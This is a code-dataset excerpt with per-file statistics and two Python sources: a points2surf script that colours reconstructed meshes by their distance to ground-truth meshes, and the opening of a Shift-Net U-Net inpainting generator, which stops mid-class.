| 0.769231
| 26
| 195
| 5.461538
| 0.730769
| 0.15493
| 0.211268
| 0.28169
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005814
| 0.117949
| 195
| 6
| 65
| 32.5
| 0.819767
| 0.420513
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.5
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 8
|
734e7be00f5be4565ab9d58b44ae82f605e8265c
| 26,762
|
py
|
Python
|
source/figure/distance_vis.py
|
phygitalism/points2surf
|
c8e6d47062fc068802e179a37427981c8e10b128
|
[
"MIT"
] | 260
|
2020-07-09T13:21:51.000Z
|
2022-03-30T09:48:49.000Z
|
source/figure/distance_vis.py
|
phygitalism/points2surf
|
c8e6d47062fc068802e179a37427981c8e10b128
|
[
"MIT"
] | 14
|
2020-12-16T05:33:59.000Z
|
2022-02-11T01:03:29.000Z
|
source/figure/distance_vis.py
|
phygitalism/points2surf
|
c8e6d47062fc068802e179a37427981c8e10b128
|
[
"MIT"
] | 31
|
2020-07-22T13:13:38.000Z
|
2022-03-04T16:14:09.000Z
|
# This messy code computes vertex colors based on the distance reconstruction <-> GT mesh
from source.base import parula_colormap
from source.base import utils_mp
import numpy as np
import trimesh
import trimesh.proximity
def get_normalization_target(distances: list, cut_percentil=0.9):
dist_concat = np.concatenate(distances, axis=0)
dist_concat_sorted = np.sort(dist_concat)
if cut_percentil is not None and cut_percentil < 1.0:
percentil_id = int(dist_concat_sorted.shape[0] * cut_percentil)
return dist_concat_sorted[percentil_id]
else:
return dist_concat_sorted[-1]
def get_closest_distance_batched(query_pts: np.ndarray, mesh: trimesh.Trimesh, batch_size=1000):
import multiprocessing
num_of_cpu = multiprocessing.cpu_count()
# process batches because trimesh's signed_distance very inefficient on memory
# 3k queries on a mesh with 27k vertices and 55k faces takes around 8 GB of RAM
# dists_ms = np.zeros((query_pts.shape[0],))
pts_ids = np.arange(query_pts.shape[0])
pts_ids_split = np.array_split(pts_ids, max(1, int(query_pts.shape[0] / batch_size)))
params = []
for pts_ids_batch in pts_ids_split:
# dists_ms[pts_ids_batch] = trimesh.proximity.closest_point(mesh, query_pts[pts_ids_batch])[1]
params.append((mesh, query_pts[pts_ids_batch]))
dist_list = utils_mp.start_process_pool(trimesh.proximity.closest_point, params, num_of_cpu)
dists = np.concatenate([d[1] for d in dist_list])
print('got distances for {} vertices'.format(query_pts.shape[0]))
return dists
def visualize_mesh_with_distances(mesh_file: str, mesh: trimesh.Trimesh,
dist_per_vertex: np.ndarray, normalize_to: float, cut_percentil=0.9):
dist_per_vertex_normalized = dist_per_vertex / normalize_to
# use parula colormap: dist=0 -> blue, dist=0.5 -> green, dist=1.0 -> yellow
parulas_indices = (dist_per_vertex_normalized * (parula_colormap.parula_cm.shape[0] - 1)).astype(np.int32)
dist_greater_than_norm_target = parulas_indices >= parula_colormap.parula_cm.shape[0]
parulas_indices[dist_greater_than_norm_target] = parula_colormap.parula_cm.shape[0] - 1
dist_colors_rgb = [parula_colormap.parula_cm[parula_indices] for parula_indices in parulas_indices]
file_out_vis = mesh_file + '_vis.ply'
mesh_vis = trimesh.Trimesh(vertices=mesh.vertices, faces=mesh.faces, vertex_colors=dist_colors_rgb)
mesh_vis.export(file_out_vis)
file_out_stats = mesh_file + '_stats.txt'
with open(file_out_stats, 'w+') as stats_file:
stats_file.write(
'Distance from reconstructed mesh vertex to nearest sample on GT mesh, '
'Min={}, Max={}, Mean={}, normalized to {}, cut percentil {}'.format(
np.min(dist_per_vertex), np.max(dist_per_vertex), np.mean(dist_per_vertex),
normalize_to, cut_percentil)
)
def make_distance_comparison(in_file_rec_meshes: list, in_file_gt_mesh, cut_percentil=0.9, batch_size=1000):
import trimesh.proximity
meshes_rec = [trimesh.load(in_file_rec_mesh) for in_file_rec_mesh in in_file_rec_meshes]
if type(in_file_gt_mesh) == str:
mesh_gt = trimesh.load(in_file_gt_mesh)
elif type(in_file_gt_mesh) == list:
mesh_gt = [trimesh.load(in_file_gt_mesh) for in_file_gt_mesh in in_file_gt_mesh]
else:
raise ValueError('Not implemented!')
# vertices_rec_dists = [trimesh.proximity.closest_point(mesh_gt, mesh_rec.vertices)[1] for mesh_rec in meshes_rec]
if type(in_file_gt_mesh) == str:
vertices_rec_dists = [get_closest_distance_batched(mesh_rec.vertices, mesh_gt, batch_size)
for mesh_rec in meshes_rec]
elif type(in_file_gt_mesh) == list:
vertices_rec_dists = [get_closest_distance_batched(mesh_rec.vertices, mesh_gt[mi], batch_size)
for mi, mesh_rec in enumerate(meshes_rec)]
else:
raise ValueError('Not implemented!')
normalize_to = get_normalization_target(vertices_rec_dists, cut_percentil=cut_percentil)
for fi, f in enumerate(in_file_rec_meshes):
visualize_mesh_with_distances(
f, meshes_rec[fi], dist_per_vertex=vertices_rec_dists[fi],
normalize_to=normalize_to, cut_percentil=cut_percentil)
def main(in_file_rec_meshes: list, in_file_gt_mesh, cut_percentile=0.9, batch_size=1000):
print('Visualize distances of {} to {}'.format(in_file_rec_meshes, in_file_gt_mesh))
make_distance_comparison(
in_file_rec_meshes=in_file_rec_meshes,
in_file_gt_mesh=in_file_gt_mesh,
cut_percentil=cut_percentile,
batch_size=batch_size
)
if __name__ == "__main__":
# # holes close-up
# mesh_name = '00011827_73c6505f827541168d5410e4_trimesh_096.ply'
# in_dirs_rec_meshes = [
# '/home/perler/Nextcloud/point2surf results/figures/features_close_up/holes/point2surf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/features_close_up/holes/spsr+pcpnet/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/features_close_up/holes/spsr+gt/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/features_close_up/holes/deepsdf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/features_close_up/holes/atlasnet/' + mesh_name[:-4] + '.xyz.npy.ply',
# ]
# in_dirs_gt_meshes = '/home/perler/Nextcloud/point2surf results/figures/features_close_up/holes/gt/' + mesh_name
# main(in_dirs_rec_meshes, in_dirs_gt_meshes, cut_percentile=0.9)
# # flat areas close-up
# mesh_name = '00019114_87f2e2e15b2746ffa4a2fd9a_trimesh_003.ply'
# in_dirs_rec_meshes = [
# '/home/perler/Nextcloud/point2surf results/figures/features_close_up/flats/point2surf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/features_close_up/flats/spsr+pcpnet/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/features_close_up/flats/spsr+gt/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/features_close_up/flats/deepsdf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/features_close_up/flats/atlasnet/' + mesh_name[:-4] + '.xyz.npy.ply',
# ]
# in_dirs_gt_meshes = '/home/perler/Nextcloud/point2surf results/figures/features_close_up/flats/gt/' + mesh_name
# main(in_dirs_rec_meshes, in_dirs_gt_meshes, cut_percentile=0.9)
# # denoising close-up
# #mesh_name = '00993706_f8bc5c196ab9685d0182bbed_trimesh_001.ply'
# mesh_name = 'Armadillo.ply'
# in_dirs_rec_meshes = [
# '/home/perler/Nextcloud/point2surf results/figures/features_close_up/denoising/point2surf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/features_close_up/denoising/spsr+pcpnet/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/features_close_up/denoising/spsr+gt/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/features_close_up/denoising/deepsdf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/features_close_up/denoising/atlasnet/' + mesh_name[:-4] + '.xyz.npy.ply',
# ]
# in_dirs_gt_meshes = '/home/perler/Nextcloud/point2surf results/figures/features_close_up/denoising/gt/' + mesh_name
# main(in_dirs_rec_meshes, in_dirs_gt_meshes, cut_percentile=0.9)
# ## denoising (luckily same rotation everywhere)
# #mesh_name = 'flower.ply'
# #in_dirs_rec_meshes = [
# # '/home/perler/Nextcloud/point2surf results/figures/noise comparison/extra_noisy/point2surf/' + mesh_name,
# # '/home/perler/Nextcloud/point2surf results/figures/noise comparison/extra_noisy/spsr+pcpnet/' + mesh_name,
# # '/home/perler/Nextcloud/point2surf results/figures/noise comparison/extra_noisy/spsr+gt/' + mesh_name,
# # '/home/perler/Nextcloud/point2surf results/figures/noise comparison/extra_noisy/deepsdf/' + mesh_name,
# # '/home/perler/Nextcloud/point2surf results/figures/noise comparison/extra_noisy/atlasnet/' + mesh_name[:-4] + '.xyz.npy.ply',
# # #
# # '/home/perler/Nextcloud/point2surf results/figures/noise comparison/noisefree/point2surf/' + mesh_name,
# # '/home/perler/Nextcloud/point2surf results/figures/noise comparison/noisefree/spsr+pcpnet/' + mesh_name,
# # '/home/perler/Nextcloud/point2surf results/figures/noise comparison/noisefree/spsr+gt/' + mesh_name,
# # '/home/perler/Nextcloud/point2surf results/figures/noise comparison/noisefree/deepsdf/' + mesh_name,
# # '/home/perler/Nextcloud/point2surf results/figures/noise comparison/noisefree/atlasnet/' + mesh_name[:-4] + '.xyz.npy.ply',
# # #
# # '/home/perler/Nextcloud/point2surf results/figures/noise comparison/original/point2surf/' + mesh_name,
# # '/home/perler/Nextcloud/point2surf results/figures/noise comparison/original/spsr+pcpnet/' + mesh_name,
# # '/home/perler/Nextcloud/point2surf results/figures/noise comparison/original/spsr+gt/' + mesh_name,
# # '/home/perler/Nextcloud/point2surf results/figures/noise comparison/original/deepsdf/' + mesh_name,
# # '/home/perler/Nextcloud/point2surf results/figures/noise comparison/original/atlasnet/' + mesh_name[:-4] + '.xyz.npy.ply',
# #]
# #in_dirs_gt_meshes = '/home/perler/Nextcloud/point2surf results/figures/noise comparison/extra_noisy/gt/' + mesh_name
# #main(in_dirs_rec_meshes, in_dirs_gt_meshes, cut_percentile=0.9)
# # denoising (different rotation unfortunately)
# mesh_name = '00010429_fc56088abf10474bba06f659_trimesh_004.ply'
# in_dirs_rec_meshes = [
# '/home/perler/Nextcloud/point2surf results/figures/noise comparison/extra_noisy/point2surf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/noise comparison/extra_noisy/deepsdf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/noise comparison/extra_noisy/atlasnet/' + mesh_name[:-4] + '.xyz.npy.ply',
# '/home/perler/Nextcloud/point2surf results/figures/noise comparison/extra_noisy/spsr+pcpnet/' + mesh_name,
# #
# '/home/perler/Nextcloud/point2surf results/figures/noise comparison/noisefree/point2surf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/noise comparison/noisefree/deepsdf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/noise comparison/noisefree/atlasnet/' + mesh_name[:-4] + '.xyz.npy.ply',
# '/home/perler/Nextcloud/point2surf results/figures/noise comparison/noisefree/spsr+pcpnet/' + mesh_name,
# #
# '/home/perler/Nextcloud/point2surf results/figures/noise comparison/original/point2surf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/noise comparison/original/deepsdf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/noise comparison/original/atlasnet/' + mesh_name[:-4] + '.xyz.npy.ply',
# '/home/perler/Nextcloud/point2surf results/figures/noise comparison/original/spsr+pcpnet/' + mesh_name,
# ]
# in_dirs_gt_meshes = [
# '/home/perler/Nextcloud/point2surf results/figures/noise comparison/extra_noisy/gt/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/noise comparison/extra_noisy/gt/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/noise comparison/extra_noisy/gt/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/noise comparison/extra_noisy/gt/' + mesh_name,
# #
# '/home/perler/Nextcloud/point2surf results/figures/noise comparison/noisefree/gt/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/noise comparison/noisefree/gt/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/noise comparison/noisefree/gt/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/noise comparison/noisefree/gt/' + mesh_name,
# #
# '/home/perler/Nextcloud/point2surf results/figures/noise comparison/original/gt/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/noise comparison/original/gt/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/noise comparison/original/gt/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/noise comparison/original/gt/' + mesh_name,
# ]
# main(in_dirs_rec_meshes, in_dirs_gt_meshes, cut_percentile=0.9)
# # qualitative abc original
# mesh_name = '00010218_4769314c71814669ba5d3512_trimesh_013.ply'
# in_dirs_rec_meshes = [
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/abc_original/point2surf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/abc_original/spsr+pcpnet/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/abc_original/spsr+gt/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/abc_original/deepsdf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/abc_original/atlasnet/' + mesh_name[:-4] + '.xyz.npy.ply',
# ]
# in_dirs_gt_meshes = '/home/perler/Nextcloud/point2surf results/figures/qualitative results/abc_original/gt/' + mesh_name
# main(in_dirs_rec_meshes, in_dirs_gt_meshes, cut_percentile=0.9)
# # qualitative abc noisefree
# mesh_name = '00994034_9299b4c10539bb6b50b162d7_trimesh_000.ply'
# in_dirs_rec_meshes = [
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/abc_noisefree/point2surf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/abc_noisefree/spsr+pcpnet/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/abc_noisefree/spsr+gt/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/abc_noisefree/deepsdf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/abc_noisefree/atlasnet/' + mesh_name[:-4] + '.xyz.npy.ply',
# ]
# in_dirs_gt_meshes = '/home/perler/Nextcloud/point2surf results/figures/qualitative results/abc_noisefree/gt/' + mesh_name
# main(in_dirs_rec_meshes, in_dirs_gt_meshes, cut_percentile=0.9)
# qualitative abc extra noisy
# mesh_name = '00993692_494894597fe7b39310a44a99_trimesh_000.ply'
# in_dirs_rec_meshes = [
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/abc_extra_noisy/point2surf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/abc_extra_noisy/spsr+pcpnet/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/abc_extra_noisy/spsr+gt/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/abc_extra_noisy/deepsdf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/abc_extra_noisy/atlasnet/' + mesh_name[:-4] + '.xyz.npy.ply',
# ]
# in_dirs_gt_meshes = '/home/perler/Nextcloud/point2surf results/figures/qualitative results/abc_extra_noisy/gt/' + mesh_name
# main(in_dirs_rec_meshes, in_dirs_gt_meshes, cut_percentile=0.9)
# # qualitative custom_dense
# mesh_name = 'horse.ply'
# in_dirs_rec_meshes = [
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_dense/point2surf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_dense/spsr+pcpnet/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_dense/spsr+gt/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_dense/deepsdf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_dense/atlasnet/' + mesh_name[:-4] + '.xyz.npy.ply',
# ]
# in_dirs_gt_meshes = '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_dense/gt/' + mesh_name
# main(in_dirs_rec_meshes, in_dirs_gt_meshes, cut_percentile=0.9)
# # qualitative custom_extra_noisy
# mesh_name = 'hand.ply'
# in_dirs_rec_meshes = [
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_extra_noisy/point2surf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_extra_noisy/spsr+pcpnet/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_extra_noisy/spsr+gt/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_extra_noisy/deepsdf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_extra_noisy/atlasnet/' + mesh_name[:-4] + '.xyz.npy.ply',
# ]
# in_dirs_gt_meshes = '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_extra_noisy/gt/' + mesh_name
# main(in_dirs_rec_meshes, in_dirs_gt_meshes, cut_percentile=0.9, batch_size=200)
# # qualitative custom_noisefree
# mesh_name = 'happy.ply'
# in_dirs_rec_meshes = [
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_noisefree/point2surf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_noisefree/spsr+pcpnet/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_noisefree/spsr+gt/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_noisefree/deepsdf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_noisefree/atlasnet/' + mesh_name[:-4] + '.xyz.npy.ply',
# ]
# in_dirs_gt_meshes = '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_noisefree/gt/' + mesh_name
# main(in_dirs_rec_meshes, in_dirs_gt_meshes, cut_percentile=0.9)
# # qualitative custom_original
# mesh_name = 'galera.ply'
# in_dirs_rec_meshes = [
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_original/point2surf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_original/spsr+pcpnet/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_original/spsr+gt/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_original/deepsdf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_original/atlasnet/' + mesh_name[:-4] + '.xyz.npy.ply',
# ]
# in_dirs_gt_meshes = '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_original/gt/' + mesh_name
# main(in_dirs_rec_meshes, in_dirs_gt_meshes, cut_percentile=0.9)
# # qualitative custom_sparse
# mesh_name = 'angel.ply'
# in_dirs_rec_meshes = [
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_sparse/point2surf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_sparse/spsr+pcpnet/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_sparse/spsr+gt/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_sparse/deepsdf/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_sparse/atlasnet/' + mesh_name[:-4] + '.xyz.npy.ply',
# ]
# in_dirs_gt_meshes = '/home/perler/Nextcloud/point2surf results/figures/qualitative results/custom_sparse/gt/' + mesh_name
# main(in_dirs_rec_meshes, in_dirs_gt_meshes, cut_percentile=0.9, batch_size=300)
# # qualitative thingi10k supplementary
# in_dirs_rec_meshes = []
# in_dirs_gt_meshes = []
# for mesh_name in ['46460.ply', '73133.ply', '77319.ply', '81762.ply', '527631.ply']:
# in_dirs_rec_meshes += [
# '/home/perler/Nextcloud/point2surf results/figures/supp_thingi10k/point2surf/original/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/supp_thingi10k/deepsdf/original/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/supp_thingi10k/atlasnet/original/' + mesh_name[:-4] + '.xyz.npy.ply',
# '/home/perler/Nextcloud/point2surf results/figures/supp_thingi10k/spsr+pcpnet/original/' + mesh_name,
# ]
# in_dirs_gt_meshes += ['/home/perler/Nextcloud/point2surf results/figures/supp_thingi10k/gt/' + mesh_name] * 4
# for mesh_name in ['75275.ply', '75652.ply', '83229.ply', '86848.ply', '120477.ply']:
# in_dirs_rec_meshes += [
# '/home/perler/Nextcloud/point2surf results/figures/supp_thingi10k/point2surf/extra_noisy/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/supp_thingi10k/deepsdf/extra_noisy/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/supp_thingi10k/atlasnet/extra_noisy/' + mesh_name[:-4] + '.xyz.npy.ply',
# '/home/perler/Nextcloud/point2surf results/figures/supp_thingi10k/spsr+pcpnet/extra_noisy/' + mesh_name,
# ]
# in_dirs_gt_meshes += ['/home/perler/Nextcloud/point2surf results/figures/supp_thingi10k/gt/' + mesh_name] * 4
# for mesh_name in ['46463.ply', '76277.ply', '85699.ply', '95444.ply', '103354.ply']:
# in_dirs_rec_meshes += [
# '/home/perler/Nextcloud/point2surf results/figures/supp_thingi10k/point2surf/noisefree/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/supp_thingi10k/deepsdf/noisefree/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/supp_thingi10k/atlasnet/noisefree/' + mesh_name[:-4] + '.xyz.npy.ply',
# '/home/perler/Nextcloud/point2surf results/figures/supp_thingi10k/spsr+pcpnet/noisefree/' + mesh_name,
# ]
# in_dirs_gt_meshes += ['/home/perler/Nextcloud/point2surf results/figures/supp_thingi10k/gt/' + mesh_name] * 4
# for mesh_name in ['46459.ply', '54725.ply', '73998.ply', '91347.ply', '92880.ply']:
# in_dirs_rec_meshes += [
# '/home/perler/Nextcloud/point2surf results/figures/supp_thingi10k/point2surf/dense/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/supp_thingi10k/deepsdf/dense/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/supp_thingi10k/atlasnet/dense/' + mesh_name[:-4] + '.xyz.npy.ply',
# '/home/perler/Nextcloud/point2surf results/figures/supp_thingi10k/spsr+pcpnet/dense/' + mesh_name,
# ]
# in_dirs_gt_meshes += ['/home/perler/Nextcloud/point2surf results/figures/supp_thingi10k/gt/' + mesh_name] * 4
# for mesh_name in ['46462.ply', '64444.ply', '64764.ply', '68381.ply', '199664.ply']:
# in_dirs_rec_meshes += [
# '/home/perler/Nextcloud/point2surf results/figures/supp_thingi10k/point2surf/sparse/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/supp_thingi10k/deepsdf/sparse/' + mesh_name,
# '/home/perler/Nextcloud/point2surf results/figures/supp_thingi10k/atlasnet/sparse/' + mesh_name[:-4] + '.xyz.npy.ply',
# '/home/perler/Nextcloud/point2surf results/figures/supp_thingi10k/spsr+pcpnet/sparse/' + mesh_name,
# ]
# in_dirs_gt_meshes += ['/home/perler/Nextcloud/point2surf results/figures/supp_thingi10k/gt/' + mesh_name] * 4
# main(in_dirs_rec_meshes, in_dirs_gt_meshes, cut_percentile=0.9, batch_size=300)
# qualitative abc supplementary
in_dirs_rec_meshes = []
in_dirs_gt_meshes = []
for mesh_name in ['00014489_f4297f01e3434034b7051ebb_trimesh_004.ply',
'00015750_bca56983eee140db9aa4c9a1_trimesh_091.ply',
'00991527_88dccf1e5fa948d4fe1757ed_trimesh_009.ply']:
in_dirs_rec_meshes += [
'/home/perler/Nextcloud/point2surf results/figures/supp_abc/point2surf/original/' + mesh_name,
'/home/perler/Nextcloud/point2surf results/figures/supp_abc/deepsdf/original/' + mesh_name,
'/home/perler/Nextcloud/point2surf results/figures/supp_abc/atlasnet/original/' + mesh_name[:-4] + '.xyz.npy.ply',
'/home/perler/Nextcloud/point2surf results/figures/supp_abc/spsr+pcpnet/original/' + mesh_name,
]
in_dirs_gt_meshes += ['/home/perler/Nextcloud/point2surf results/figures/supp_abc/gt/original/' + mesh_name] * 4
for mesh_name in ['00012076_bd0ba1071db44a4cb05e612c_trimesh_011.ply',
'00017846_08893609d30e453493c4c079_trimesh_021.ply',
'00018330_ae93a6d282364256a7bb3358_trimesh_010.ply']:
in_dirs_rec_meshes += [
'/home/perler/Nextcloud/point2surf results/figures/supp_abc/point2surf/extra_noisy/' + mesh_name,
'/home/perler/Nextcloud/point2surf results/figures/supp_abc/deepsdf/extra_noisy/' + mesh_name,
'/home/perler/Nextcloud/point2surf results/figures/supp_abc/atlasnet/extra_noisy/' + mesh_name[:-4] + '.xyz.npy.ply',
'/home/perler/Nextcloud/point2surf results/figures/supp_abc/spsr+pcpnet/extra_noisy/' + mesh_name,
]
in_dirs_gt_meshes += ['/home/perler/Nextcloud/point2surf results/figures/supp_abc/gt/extra_noisy/' + mesh_name] * 4
for mesh_name in ['00011000_8a21002f126e4425a811e70a_trimesh_004.ply',
'00011602_c087f04c99464bf7ab2380c4_trimesh_000.ply',
'00993805_e549aee7e0b31a7501eb8669_trimesh_012.ply']:
in_dirs_rec_meshes += [
'/home/perler/Nextcloud/point2surf results/figures/supp_abc/point2surf/noisefree/' + mesh_name,
'/home/perler/Nextcloud/point2surf results/figures/supp_abc/deepsdf/noisefree/' + mesh_name,
'/home/perler/Nextcloud/point2surf results/figures/supp_abc/atlasnet/noisefree/' + mesh_name[:-4] + '.xyz.npy.ply',
'/home/perler/Nextcloud/point2surf results/figures/supp_abc/spsr+pcpnet/noisefree/' + mesh_name,
]
in_dirs_gt_meshes += ['/home/perler/Nextcloud/point2surf results/figures/supp_abc/gt/noisefree/' + mesh_name] * 4
main(in_dirs_rec_meshes, in_dirs_gt_meshes, cut_percentile=0.9, batch_size=300)
| 69.692708
| 145
| 0.72319
| 3,348
| 26,762
| 5.514038
| 0.083035
| 0.072802
| 0.150263
| 0.229348
| 0.815557
| 0.799144
| 0.787769
| 0.774173
| 0.768106
| 0.768106
| 0
| 0.040191
| 0.153015
| 26,762
| 383
| 146
| 69.874674
| 0.774253
| 0.691652
| 0
| 0.130841
| 0
| 0
| 0.237588
| 0.199975
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046729
| false
| 0
| 0.065421
| 0
| 0.140187
| 0.018692
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b4053e6a49a2d2dda8ef7eb7bf5c30050de097fd
| 26,254
|
py
|
Python
|
models/modules/shift_unet.py
|
Sunshine352/Shift-Net_pytorch
|
a7e7ddbf966bd65f16e7fe2c36ec6be7e9e813d0
|
[
"MIT"
] | 1
|
2018-12-21T05:42:07.000Z
|
2018-12-21T05:42:07.000Z
|
models/modules/shift_unet.py
|
Sunshine352/Shift-Net_pytorch
|
a7e7ddbf966bd65f16e7fe2c36ec6be7e9e813d0
|
[
"MIT"
] | null | null | null |
models/modules/shift_unet.py
|
Sunshine352/Shift-Net_pytorch
|
a7e7ddbf966bd65f16e7fe2c36ec6be7e9e813d0
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
from models.accelerated_shift_net.accelerated_InnerShiftTriple import AcceleratedInnerShiftTriple
from models.shift_net.InnerCos import InnerCos
from models.shift_net.InnerShiftTriple import InnerShiftTriple
from models.soft_shift_net.innerSoftShiftTriple import InnerSoftShiftTriple
from .unet import UnetSkipConnectionBlock
from .modules import *
################################### *************************** #####################################
################################### This the original Shift_net #####################################
################################### *************************** #####################################
# Defines the Unet generator.
# |num_downs|: number of downsamplings in UNet. For example,
# if |num_downs| == 7, image of size 128x128 will become of size 1x1
# at the bottleneck
class UnetGeneratorShiftTriple(nn.Module):
def __init__(self, input_nc, output_nc, num_downs, opt, innerCos_list, shift_list, mask_global, ngf=64,
norm_layer=nn.BatchNorm2d, use_dropout=False):
super(UnetGeneratorShiftTriple, self).__init__()
# construct unet structure
unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=None, norm_layer=norm_layer, innermost=True)
for i in range(num_downs - 5): # The innner layers number is 3 (sptial size:512*512), if unet_256.
unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=unet_block, norm_layer=norm_layer, use_dropout=use_dropout)
unet_block = UnetSkipConnectionBlock(ngf * 4, ngf * 8, input_nc=None, submodule=unet_block, norm_layer=norm_layer)
unet_shift_block = UnetSkipConnectionShiftTriple(ngf * 2, ngf * 4, opt, innerCos_list, shift_list, mask_global, input_nc=None, \
submodule=unet_block, norm_layer=norm_layer) # passing in unet_shift_block
unet_block = UnetSkipConnectionBlock(ngf, ngf * 2, input_nc=None, submodule=unet_shift_block, norm_layer=norm_layer)
unet_block = UnetSkipConnectionBlock(output_nc, ngf, input_nc=input_nc, submodule=unet_block, outermost=True, norm_layer=norm_layer)
self.model = unet_block
def forward(self, input):
return self.model(input)
# Mention: the TripleBlock differs in `upconv` defination.
# 'cos' means that we add a `innerCos` layer in the block.
class UnetSkipConnectionShiftTriple(nn.Module):
